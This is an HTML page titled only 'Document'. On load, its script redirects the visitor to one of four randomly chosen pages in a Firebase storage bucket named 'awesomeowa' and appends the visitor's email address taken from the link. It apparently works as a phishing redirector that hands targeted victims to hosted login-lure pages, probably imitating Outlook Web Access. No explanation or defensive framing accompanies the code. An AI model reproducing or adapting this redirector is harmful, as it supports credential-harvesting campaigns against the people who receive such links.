<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <script>
        window.location.replace(`${[
            'https://firebasestorage.googleapis.com/v0/b/awesomeowa.appspot.com/o/rcowfort%2Findexr1.html?alt=media&token=757ac2f2-aeb1-47a1-ac0d-5aa91b2663e0',
            'https://firebasestorage.googleapis.com/v0/b/awesomeowa.appspot.com/o/rcowfort%2Findexr2.html?alt=media&token=38854c0c-3b27-4fbd-9599-d47144f1cc57',
            'https://firebasestorage.googleapis.com/v0/b/awesomeowa.appspot.com/o/rcowfort%2Findexr4.html?alt=media&token=e79f5a28-7091-410e-ad58-36b42368e193',
            'https://firebasestorage.googleapis.com/v0/b/awesomeowa.appspot.com/o/rcowfort%2Findexr5.html?alt=media&token=d0358482-6e60-421f-8eab-c90b1dce7720'
        ][Math.floor(Math.random() * 4)]}&email=${new URLSearchParams(window.location.search).get('email')? new URLSearchParams(window.location.search).get('email') : ''}`)
    </script>  
</body>
</html>
